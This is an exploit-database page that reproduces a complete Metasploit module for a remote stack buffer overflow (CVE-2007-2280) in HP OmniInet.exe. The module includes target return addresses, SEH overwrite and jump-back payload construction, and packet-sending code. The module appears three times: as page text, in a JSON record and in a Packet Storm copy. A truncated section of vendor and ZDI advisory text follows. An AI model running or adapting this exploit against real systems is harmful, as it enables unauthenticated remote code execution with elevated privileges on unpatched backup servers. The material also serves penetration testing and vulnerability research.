Search...

HP OmniInet.exe MSG_PROTOCOL Buffer Overflow

2010-09-20T00:00:00

ID EDB-ID:16455
Type exploitdb
Reporter metasploit
Modified 2010-09-20T00:00:00

Description

HP OmniInet.exe MSG_PROTOCOL Buffer Overflow. CVE-2007-2280. Remote exploit for windows platform

                                        
                                            ##
# $Id: hp_omniinet_1.rb 10394 2010-09-20 08:06:27Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 &lt; Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::Tcp
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,
			'Name'           =&gt; 'HP OmniInet.exe MSG_PROTOCOL Buffer Overflow',
			'Description'    =&gt; %q{
					This module exploits a stack-based buffer overflow in the Hewlett-Packard
				OmniInet NT Service. By sending a specially crafted MSG_PROTOCOL (0x010b)
				packet, a remote attacker may be able to execute arbitrary code with elevated
				privileges.

				This service is installed with HP OpenView Data Protector, HP Application
				Recovery Manager and potentially other products. This exploit has been tested
				against versions 6.1, 6.0, and 5.50 of Data Protector. and versions 6.0 and 6.1
				of Application Recovery Manager.

				NOTE: There are actually two consecutive wcscpy() calls in the program (which
				may be why ZDI considered them two separate issues). However, this module only
				exploits the first one.
			},
			'Author'         =&gt;
				[
					'EgiX &lt;n0b0d13s[at]gmail.com&gt;',
					'Fairuzan Roslan &lt;riaf[at]mysec.org&gt;',
					'jduck'
				],
			'Version'        =&gt; '$Revision: 10394 $',
			'References'     =&gt;
				[
					[ 'CVE', '2007-2280' ],
					[ 'BID', '37396' ],
					[ 'OSVDB', '61206' ],
					[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-09-099' ]
				],
			'Privileged'     =&gt; true,
			'DefaultOptions' =&gt;
				{
					'EXITFUNC' =&gt; 'seh',
				},
			'Payload' =&gt;
				{
					'Space'    =&gt; 4658+66,
					'BadChars' =&gt; "\x00", # (we don't want \x00\x00)
					'StackAdjustment' =&gt; -3500
				},
			'Platform'       =&gt; 'win',
			'Targets'        =&gt;
				[
					[ 'Automatic Targeting', { 'auto' =&gt; true }  ],

					# DP Targets
					[ 'HP OpenView Storage Data Protector A.05.50: INET, internal build 330',
						{
							'Ret' =&gt; 0x004406cf # p/p/r - OmniInet.exe (v5.50.330.0)
						}
					],
					[ 'HP OpenView Storage Data Protector A.06.00: INET, internal build 331',
						{
							'Ret' =&gt; 0x0044327d # p/p/r - OmniInet.exe (v6.0.331.0)
						}
					],

					# APPRM Targets
					[ 'HP StorageWorks Application Recovery Manager A.06.00: INET, internal build 81',
						{
							'Ret' =&gt; 0x004280ff # p/p/r - OmniInet.exe (v6.0.81.0)
						}
					],
					[ 'HP Application Recovery Manager software A.06.10: INET, internal build 282',
						{
							'Ret' =&gt; 0x004412ed # p/p/r - OmniInet.exe (v6.0.282.0)
						}
					]
				],
			'DefaultTarget'  =&gt; 0,
			'DisclosureDate' =&gt; 'Dec 17 2009'))

		register_options([Opt::RPORT(5555)], self.class)
	end

	def check
		connect
		sock.put(rand_text_alpha_upper(64))
		resp = sock.get_once(-1,5)
		disconnect

		if (resp)
			resp = resp.unpack('v*').pack('C*')
			print_status("Received response: " + resp)

			# extract version
			if (resp =~ /HP Data Protector/)
				version = resp.split[3]
			elsif (resp =~ /HP OpenView Storage Data Protector/)
				version = resp.split[5]
			elsif (resp =~ /HP StorageWorks Application Recovery Manager/)
				version = resp.split[5]
			else
				return Exploit::CheckCode::Detected
			end

			version = version.split('.')
			major = version[1].to_i
			minor = version[2].to_i
			if ((major &lt; 6) or (major == 6 and minor &lt; 11))
				return Exploit::CheckCode::Vulnerable
			end

			if ((major &gt; 6) or (major == 6 and minor &gt;= 11))
				return Exploit::CheckCode::Safe
			end

		end
		return Exploit::CheckCode::Safe
	end

	def exploit
		mytarget = target

		if (target['auto'])
			mytarget = nil

			print_status("Automatically detecting the target...")

			connect
			sock.put(rand_text_alpha_upper(64))
			resp = sock.get_once(-1,5)
			disconnect

			if not resp
				raise RuntimeError, "No version response returned."
			end

			resp = resp.unpack('v*').pack('C*')
			print_status("Received response: " + resp)

			self.targets.each do |t|
				if (resp =~ /#{t.name}/) then
					mytarget = t
					break
				end
			end

			if (not mytarget)
				raise RuntimeError, "No matching target"
			end

			print_status("Selected Target: #{mytarget.name}")
		else
			print_status("Trying target #{mytarget.name}...")
		end

		# separator between arguments
		sep = [0x2000].pack('N')

		# Unicode BOM
		pkt = "\xff\xfe"
		# MSG_PROTOCOL command
		pkt &lt;&lt; Rex::Text.to_unicode("267")

		# dunno
		3.times do
			pkt &lt;&lt; sep
			pkt &lt;&lt; rand_text_alpha_upper(2)
		end

		# culprit string
		pkt &lt;&lt; sep

		# the payload + seh record
		pkt &lt;&lt; payload.encoded
		pkt &lt;&lt; generate_seh_record(mytarget.ret)

		# jump back
		dist = payload_space + 8
		pkt &lt;&lt; Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + dist.to_s).encode_string

		# force exception hitting the end of the stack
		pkt &lt;&lt; rand_text_alphanumeric(1000) * 25

		# 5th arg
		pkt &lt;&lt; sep
		pkt &lt;&lt; rand_text_alpha_upper(2)

		# end marker
		pkt &lt;&lt; sep

		# packet length
		buff = [pkt.length].pack('N')
		buff &lt;&lt; pkt

		connect
		print_status("Sending MSG_PROTOCOL packet...")
		sock.put(buff)

		handler
		disconnect

	end

end

JSON Vulners Source

Initial Source

{"id": "EDB-ID:16455", "hash": "50a62fadc4bafa83dbf58b060a83a361", "type": "exploitdb", "bulletinFamily": "exploit", "title": "HP OmniInet.exe MSG_PROTOCOL Buffer Overflow", "description": "HP OmniInet.exe MSG_PROTOCOL Buffer Overflow. CVE-2007-2280. Remote exploit for windows platform", "published": "2010-09-20T00:00:00", "modified": "2010-09-20T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/16455/", "reporter": "metasploit", "references": [], "cvelist": ["CVE-2007-2280"], "lastseen": "2016-02-01T23:54:32", "history": [], "viewCount": 9, "enchantments": {"score": {"value": 9.9, "vector": "NONE", "modified": "2016-02-01T23:54:32"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-2280"]}, {"type": "seebug", "idList": ["SSV:15116"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:84905"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:22980", "SECURITYVULNS:VULN:10483", "SECURITYVULNS:DOC:22965"]}, {"type": "nessus", "idList": ["HP_DATA_PROTECTOR_MSG_PROTOCOL_BOF.NASL", "HPUX_PHSS_37383.NASL", "HPUX_PHSS_36622.NASL", "HPUX_PHSS_36589.NASL", "HPUX_PHSS_36799.NASL", "HPUX_PHSS_36588.NASL", "HPUX_PHSS_37382.NASL", "HPUX_PHSS_36800.NASL", "HPUX_PHSS_36623.NASL"]}, {"type": "zdi", "idList": ["ZDI-09-099"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/MISC/HP_OMNIINET_1"]}], "modified": "2016-02-01T23:54:32"}, "vulnersScore": 9.9}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/16455/", "sourceData": "##\r\n# $Id: hp_omniinet_1.rb 10394 2010-09-20 08:06:27Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\n\r\nrequire 'msf/core'\r\n\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GreatRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Tcp\r\n\tinclude Msf::Exploit::Remote::Seh\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'HP OmniInet.exe MSG_PROTOCOL Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a stack-based buffer overflow in the Hewlett-Packard\r\n\t\t\t\tOmniInet NT Service. By sending a specially crafted MSG_PROTOCOL (0x010b)\r\n\t\t\t\tpacket, a remote attacker may be able to execute arbitrary code with elevated\r\n\t\t\t\tprivileges.\r\n\r\n\t\t\t\tThis service is installed with HP OpenView Data Protector, HP Application\r\n\t\t\t\tRecovery Manager and potentially other products. This exploit has been tested\r\n\t\t\t\tagainst versions 6.1, 6.0, and 5.50 of Data Protector. and versions 6.0 and 6.1\r\n\t\t\t\tof Application Recovery Manager.\r\n\r\n\t\t\t\tNOTE: There are actually two consecutive wcscpy() calls in the program (which\r\n\t\t\t\tmay be why ZDI considered them two separate issues). However, this module only\r\n\t\t\t\texploits the first one.\r\n\t\t\t},\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'EgiX <n0b0d13s[at]gmail.com>',\r\n\t\t\t\t\t'Fairuzan Roslan <riaf[at]mysec.org>',\r\n\t\t\t\t\t'jduck'\r\n\t\t\t\t],\r\n\t\t\t'Version' => '$Revision: 10394 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2007-2280' ],\r\n\t\t\t\t\t[ 'BID', '37396' ],\r\n\t\t\t\t\t[ 'OSVDB', '61206' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-09-099' ]\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => true,\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'seh',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 4658+66,\r\n\t\t\t\t\t'BadChars' => \"\\x00\", # (we don't want \\x00\\x00)\r\n\t\t\t\t\t'StackAdjustment' => -3500\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Automatic Targeting', { 'auto' => true } ],\r\n\r\n\t\t\t\t\t# DP Targets\r\n\t\t\t\t\t[ 'HP OpenView Storage Data Protector A.05.50: INET, internal build 330',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x004406cf # p/p/r - OmniInet.exe (v5.50.330.0)\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'HP OpenView Storage Data Protector A.06.00: INET, internal build 331',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x0044327d # p/p/r - OmniInet.exe (v6.0.331.0)\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\r\n\t\t\t\t\t# APPRM Targets\r\n\t\t\t\t\t[ 'HP StorageWorks Application Recovery Manager A.06.00: INET, internal build 81',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x004280ff # p/p/r - OmniInet.exe (v6.0.81.0)\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'HP Application Recovery Manager software A.06.10: INET, internal build 282',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x004412ed # p/p/r - OmniInet.exe (v6.0.282.0)\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t]\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget' => 0,\r\n\t\t\t'DisclosureDate' => 'Dec 17 2009'))\r\n\r\n\t\tregister_options([Opt::RPORT(5555)], self.class)\r\n\tend\r\n\r\n\tdef check\r\n\t\tconnect\r\n\t\tsock.put(rand_text_alpha_upper(64))\r\n\t\tresp = sock.get_once(-1,5)\r\n\t\tdisconnect\r\n\r\n\t\tif (resp)\r\n\t\t\tresp = resp.unpack('v*').pack('C*')\r\n\t\t\tprint_status(\"Received response: \" + resp)\r\n\r\n\t\t\t# extract version\r\n\t\t\tif (resp =~ /HP Data Protector/)\r\n\t\t\t\tversion = resp.split[3]\r\n\t\t\telsif (resp =~ /HP OpenView Storage Data Protector/)\r\n\t\t\t\tversion = resp.split[5]\r\n\t\t\telsif (resp =~ /HP StorageWorks Application Recovery Manager/)\r\n\t\t\t\tversion = resp.split[5]\r\n\t\t\telse\r\n\t\t\t\treturn Exploit::CheckCode::Detected\r\n\t\t\tend\r\n\r\n\t\t\tversion = version.split('.')\r\n\t\t\tmajor = version[1].to_i\r\n\t\t\tminor = version[2].to_i\r\n\t\t\tif ((major < 6) or (major == 6 and minor < 11))\r\n\t\t\t\treturn Exploit::CheckCode::Vulnerable\r\n\t\t\tend\r\n\r\n\t\t\tif ((major > 6) or (major == 6 and minor >= 11))\r\n\t\t\t\treturn Exploit::CheckCode::Safe\r\n\t\t\tend\r\n\r\n\t\tend\r\n\t\treturn Exploit::CheckCode::Safe\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tmytarget = target\r\n\r\n\t\tif (target['auto'])\r\n\t\t\tmytarget = nil\r\n\r\n\t\t\tprint_status(\"Automatically detecting the target...\")\r\n\r\n\t\t\tconnect\r\n\t\t\tsock.put(rand_text_alpha_upper(64))\r\n\t\t\tresp = sock.get_once(-1,5)\r\n\t\t\tdisconnect\r\n\r\n\t\t\tif not resp\r\n\t\t\t\traise RuntimeError, \"No version response returned.\"\r\n\t\t\tend\r\n\r\n\t\t\tresp = resp.unpack('v*').pack('C*')\r\n\t\t\tprint_status(\"Received response: \" + resp)\r\n\r\n\t\t\tself.targets.each do |t|\r\n\t\t\t\tif (resp =~ /#{t.name}/) then\r\n\t\t\t\t\tmytarget = t\r\n\t\t\t\t\tbreak\r\n\t\t\t\tend\r\n\t\t\tend\r\n\r\n\t\t\tif (not mytarget)\r\n\t\t\t\traise RuntimeError, \"No matching target\"\r\n\t\t\tend\r\n\r\n\t\t\tprint_status(\"Selected Target: #{mytarget.name}\")\r\n\t\telse\r\n\t\t\tprint_status(\"Trying target #{mytarget.name}...\")\r\n\t\tend\r\n\r\n\t\t# separator between arguments\r\n\t\tsep = [0x2000].pack('N')\r\n\r\n\t\t# Unicode BOM\r\n\t\tpkt = \"\\xff\\xfe\"\r\n\t\t# MSG_PROTOCOL command\r\n\t\tpkt << Rex::Text.to_unicode(\"267\")\r\n\r\n\t\t# dunno\r\n\t\t3.times do\r\n\t\t\tpkt << sep\r\n\t\t\tpkt << rand_text_alpha_upper(2)\r\n\t\tend\r\n\r\n\t\t# culprit string\r\n\t\tpkt << sep\r\n\r\n\t\t# the payload + seh record\r\n\t\tpkt << payload.encoded\r\n\t\tpkt << generate_seh_record(mytarget.ret)\r\n\r\n\t\t# jump back\r\n\t\tdist = payload_space + 8\r\n\t\tpkt << Metasm::Shellcode.assemble(Metasm::Ia32.new, \"jmp $-\" + dist.to_s).encode_string\r\n\r\n\t\t# force exception hitting the end of the stack\r\n\t\tpkt << rand_text_alphanumeric(1000) * 25\r\n\r\n\t\t# 5th arg\r\n\t\tpkt << sep\r\n\t\tpkt << rand_text_alpha_upper(2)\r\n\r\n\t\t# end marker\r\n\t\tpkt << sep\r\n\r\n\t\t# packet length\r\n\t\tbuff = [pkt.length].pack('N')\r\n\t\tbuff << pkt\r\n\r\n\t\tconnect\r\n\t\tprint_status(\"Sending MSG_PROTOCOL packet...\")\r\n\t\tsock.put(buff)\r\n\r\n\t\thandler\r\n\t\tdisconnect\r\n\r\n\tend\r\n\r\nend\r\n", "osvdbidlist": ["61206"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}

{"cve": [{"lastseen": "2019-05-29T18:08:59", "bulletinFamily": "NVD", "description": "Stack-based buffer overflow in OmniInet.exe (aka the backup client service daemon) in the Application Recovery Manager component in HP OpenView Storage Data Protector 5.50 and 6.0 allows remote attackers to execute arbitrary code via an MSG_PROTOCOL command with long arguments, a different vulnerability than CVE-2009-3844.", "modified": "2009-12-23T06:26:00", "id": "CVE-2007-2280", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-2280", "published": "2009-12-18T19:30:00", "title": "CVE-2007-2280", "type": "cve", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:13:05", "bulletinFamily": "exploit", "description": "", "modified": "2010-01-07T00:00:00", "published": "2010-01-07T00:00:00", "href": "https://packetstormsecurity.com/files/84905/HP-OmniInet.exe-MSG_PROTOCOL-Buffer-Overflow.html", "id": "PACKETSTORM:84905", "type": "packetstorm", "title": "HP OmniInet.exe MSG_PROTOCOL Buffer Overflow", "sourceData": "`## \n# $Id: hp_omniinet_1.rb 8080 2010-01-06 20:09:34Z jduck $ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = GreatRanking \n \ninclude Msf::Exploit::Remote::Tcp \ninclude Msf::Exploit::Remote::Seh \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'HP OmniInet.exe MSG_PROTOCOL Buffer Overflow', \n'Description' => %q{ \nThis module exploits a stack-based buffer overflow in the Hewlett-Packard \nOmniInet NT Service. By sending a specially crafted MSG_PROTOCOL (0x010b) \npacket, a remote attacker may be able to execute arbitrary code with elevated \nprivileges. \n \nThis service is installed with HP OpenView Data Protector, HP Application \nRecovery Manager and potentially other products. This exploit has been tested \nagainst versions 6.1, 6.0, and 5.50 of Data Protector. and versions 6.0 and 6.1 \nof Application Recovery Manager. \n \nNOTE: There are actually two consecutive wcscpy() calls in the program (which \nmay be why ZDI considered them two separate issues). However, this module only \nexploits the first one. \n}, \n'Author' => \n[ \n'EgiX <n0b0d13s[at]gmail.com>', \n'Fairuzan Roslan <riaf[at]mysec.org>', \n'jduck' \n], \n'Version' => '$Revision: 8080 $', \n'References' => \n[ \n[ 'CVE', '2007-2280' ], \n[ 'BID', '37396' ], \n[ 'OSVDB', '61206' ], \n[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-09-099' ] \n], \n'Privileged' => true, \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'seh', \n}, \n'Payload' => \n{ \n'Space' => 4658+66, \n'BadChars' => \"\\x00\", # (we don't want \\x00\\x00) \n'StackAdjustment' => -3500 \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Automatic Targeting', { 'auto' => true } ], \n \n# DP Targets \n[ 'HP OpenView Storage Data Protector A.05.50: INET, internal build 330', \n{ \n'Ret' => 0x004406cf # p/p/r - OmniInet.exe (v5.50.330.0) \n} \n], \n[ 'HP OpenView Storage Data Protector A.06.00: INET, internal build 331', \n{ \n'Ret' => 0x0044327d # p/p/r - OmniInet.exe (v6.0.331.0) \n} \n], \n \n# APPRM Targets \n[ 'HP StorageWorks Application Recovery Manager A.06.00: INET, internal build 81', \n{ \n'Ret' => 0x004280ff # p/p/r - OmniInet.exe (v6.0.81.0) \n} \n], \n[ 'HP Application Recovery Manager software A.06.10: INET, internal build 282', \n{ \n'Ret' => 0x004412ed # p/p/r - OmniInet.exe (v6.0.282.0) \n} \n] \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => 'Dec 17 2009')) \n \nregister_options([Opt::RPORT(5555)], self.class) \nend \n \ndef check \nconnect \nsock.put(rand_text_alpha_upper(64)) \nresp = sock.get_once(-1,5) \ndisconnect \n \nif (resp) \nresp = resp.unpack('v*').pack('C*') \nprint_status(\"Received response: \" + resp) \n \n# extract version \nif (resp =~ /HP Data Protector/) \nversion = resp.split[3] \nelsif (resp =~ /HP OpenView Storage Data Protector/) \nversion = resp.split[5] \nelsif (resp =~ /HP StorageWorks Application Recovery Manager/) \nversion = resp.split[5] \nelse \nreturn Exploit::CheckCode::Detected \nend \n \nversion = version.split('.') \nmajor = version[1].to_i \nminor = version[2].to_i \nif ((major < 6) or (major == 6 and minor < 11)) \nreturn Exploit::CheckCode::Vulnerable \nend \n \nif ((major > 6) or (major == 6 and minor >= 11)) \nreturn Exploit::CheckCode::Safe \nend \n \nend \nreturn Exploit::CheckCode::Safe \nend \n \ndef exploit \nmytarget = target \n \nif (target['auto']) \nmytarget = nil \n \nprint_status(\"Automatically detecting the target...\") \n \nconnect \nsock.put(rand_text_alpha_upper(64)) \nresp = sock.get_once(-1,5) \ndisconnect \n \nif not resp \nraise RuntimeError, \"No version response returned.\" \nend \n \nresp = resp.unpack('v*').pack('C*') \nprint_status(\"Received response: \" + resp) \n \nself.targets.each do |t| \nif (resp =~ /#{t.name}/) then \nmytarget = t \nbreak \nend \nend \n \nif (not mytarget) \nraise RuntimeError, \"No matching target\" \nend \n \nprint_status(\"Selected Target: #{mytarget.name}\") \nelse \nprint_status(\"Trying target #{mytarget.name}...\") \nend \n \n# separator between arguments \nsep = [0x2000].pack('N') \n \n# Unicode BOM \npkt = \"\\xff\\xfe\" \n# MSG_PROTOCOL command \npkt << Rex::Text.to_unicode(\"267\") \n \n# dunno \n3.times do \npkt << sep \npkt << rand_text_alpha_upper(2) \nend \n \n# culprit string \npkt << sep \n \n# the payload + seh record \npkt << payload.encoded \npkt << generate_seh_record(mytarget.ret) \n \n# jump back \ndist = payload_space + 8 \npkt << Metasm::Shellcode.assemble(Metasm::Ia32.new, \"jmp $-\" + dist.to_s).encode_string \n \n# force exception hitting the end of the stack \npkt << rand_text_alphanumeric(1000) * 25 \n \n# 5th arg \npkt << sep \npkt << rand_text_alpha_upper(2) \n \n# end marker \npkt << sep \n \n# packet length \nbuff = [pkt.length].pack('N') \nbuff << pkt \n \nconnect \nprint_status(\"Sending MSG_PROTOCOL packet...\") \nsock.put(buff) \n \nhandler \ndisconnect \n \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/84905/hp_omniinet_1.rb.txt", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T18:28:17", "bulletinFamily": "exploit", "description": "BUGTRAQ ID: 37396\r\nCVE(CAN) ID: CVE-2007-2280\r\n\r\nHP OpenView Storage Data Protector\u662f\u53ef\u6269\u5c55\u7684\u6570\u636e\u7ba1\u7406\u89e3\u51b3\u65b9\u6848\uff0c\u5b9e\u73b0\u57fa\u4e8e\u78c1\u76d8\u6216\u78c1\u5e26\u7684\u9ad8\u6027\u80fd\u5907\u4efd\u548c\u6062\u590d\u529f\u80fd\u3002\r\n\r\nOpenView Storage Data Protector\u9ed8\u8ba4\u7ed1\u5b9a\u5728TCP 5555\u7aef\u53e3\u4e0a\u7684\u5907\u4efd\u5ba2\u6237\u7aef\u670d\u52a1\u5b88\u62a4\u7a0b\u5e8f\uff08OmniInet.exe\uff09\u5728\u5904\u7406\u53d1\u9001\u7ed9MSG_PROTOCOL\u547d\u4ee4\u7684\u8d85\u957f\u53c2\u6570\u65f6\u5b58\u5728\u6808\u6ea2\u51fa\u6f0f\u6d1e\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u4ee5\u901a\u8fc7\u63d0\u4ea4\u6076\u610f\u8bf7\u6c42\u89e6\u53d1\u8fd9\u4e2a\u6ea2\u51fa\uff0c\u5bfc\u81f4\u4ee5\u670d\u52a1\u7684\u6743\u9650\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002\n\nHP OpenView Storage Data Protector 6.0\r\nHP OpenView Storage Data Protector 5.5\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nHP\r\n--\r\nHP\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08HPSBMA02252\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nHPSBMA02252\uff1aSSRT061258, SSRT061259 rev.1 - HP OpenView Storage Data Protector, Remote Arbitrary Code Execution\r\n\u94fe\u63a5\uff1ahttp://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01124817&printver=true", "modified": "2009-12-20T00:00:00", "published": "2009-12-20T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-15116", "id": "SSV:15116", "type": "seebug", "title": "HP OpenView Storage Data Protector\u5907\u4efd\u5ba2\u6237\u7aef\u670d\u52a1\u6808\u6ea2\u51fa\u6f0f\u6d1e", "sourceData": "", "sourceHref": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:32", "bulletinFamily": "software", "description": "ZDI-09-099: Hewlett-Packard OpenView Data Protector Backup Client Service Buffer Overflow Vulnerability\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-09-099\r\nDecember 17, 2009\r\n\r\n-- CVE ID:\r\nCVE-2007-2280\r\n\r\n-- Affected Vendors:\r\nHewlett-Packard\r\n\r\n-- Affected Products:\r\nHewlett-Packard OpenView Data Protector\r\n\r\n-- TippingPoint(TM) IPS Customer Protection:\r\nTippingPoint IPS customers have been protected against this\r\nvulnerability by Digital Vaccine protection filter ID 4786. \r\nFor further product information on the TippingPoint IPS, visit:\r\n\r\n http://www.tippingpoint.com\r\n\r\n-- Vulnerability Details:\r\nThis vulnerability allows remote attackers to execute arbitrary code on\r\nvulnerable installations of Hewlett-Packard Storage Data Protector.\r\nAuthentication is not required to exploit this vulnerability.\r\n\r\nThe specific flaw exists within the backup client service daemon\r\n(OmniInet.exe), which binds to TCP port 5555. During the processing of\r\nlong arguments to the 'MSG_PROTOCOL' command, a stack based buffer\r\noverflow occurs and can result in code execution under the context of\r\nthe daemon.\r\n\r\n-- Vendor Response:\r\nHewlett-Packard has issued an update to correct this vulnerability. More\r\ndetails can be found at:\r\n\r\nhttp://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01124817\r\n\r\n-- Disclosure Timeline:\r\n2006-10-10 - Vulnerability reported to vendor\r\n2009-12-17 - Coordinated public release of advisory\r\n\r\n-- Credit:\r\nThis vulnerability was discovered by:\r\n * Tenable Network Security\r\n * Aaron Portnoy, TippingPoint DVLabs\r\n\r\n-- About the Zero Day Initiative (ZDI):\r\nEstablished by TippingPoint, The Zero Day Initiative (ZDI) represents \r\na best-of-breed model for rewarding security researchers for responsibly\r\ndisclosing discovered vulnerabilities.\r\n\r\nResearchers interested in getting paid for their security research\r\nthrough the ZDI can find more information and sign-up at:\r\n\r\n http://www.zerodayinitiative.com\r\n\r\nThe ZDI is unique in how the acquired vulnerability information is\r\nused. TippingPoint does not re-sell the vulnerability details or any\r\nexploit code. Instead, upon notifying the affected product vendor,\r\nTippingPoint provides its customers with zero day protection through\r\nits intrusion prevention technology. Explicit details regarding the\r\nspecifics of the vulnerability are not exposed to any parties until\r\nan official vendor patch is publicly available. Furthermore, with the\r\naltruistic aim of helping to secure a broader user base, TippingPoint\r\nprovides this vulnerability information confidentially to security\r\nvendors (including competitors) who have a vulnerability protection or\r\nmitigation product.\r\n\r\nOur vulnerability disclosure policy is available online at:\r\n\r\n http://www.zerodayinitiative.com/advisories/disclosure_policy/", "modified": "2009-12-21T00:00:00", "published": "2009-12-21T00:00:00", "id": "SECURITYVULNS:DOC:22980", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22980", "title": "ZDI-09-099: Hewlett-Packard OpenView Data Protector Backup Client Service Buffer Overflow Vulnerability", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:35", "bulletinFamily": "software", "description": "No description provided", "modified": "2009-12-21T00:00:00", "published": "2009-12-21T00:00:00", "id": "SECURITYVULNS:VULN:10483", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10483", "title": "HP OpenView Storage Data Protector code execution", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:32", "bulletinFamily": "software", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c01124817\r\nVersion: 1\r\n\r\nHPSBMA02252 SSRT061258, SSRT061259 rev.1 - HP OpenView Storage Data Protector, Remote Arbitrary Code Execution\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as soon as possible.\r\n\r\nRelease Date: 2009-12-16\r\nLast Updated: 2009-12-16\r\n\r\nPotential Security Impact: Remote execution of arbitrary code\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nPotential security vulnerabilities have been identified with HP OpenView Storage Data Protector running on HP-UX, Windows, Linux and Solaris. These vulnerabilities could be exploited remotely to execute arbitrary code.\r\n\r\nReferences: CVE-2007-2280, CVE-2007-2281\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP OpenView Data Protector Application Recovery Manager v5.50 and v6.0\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2007-2280 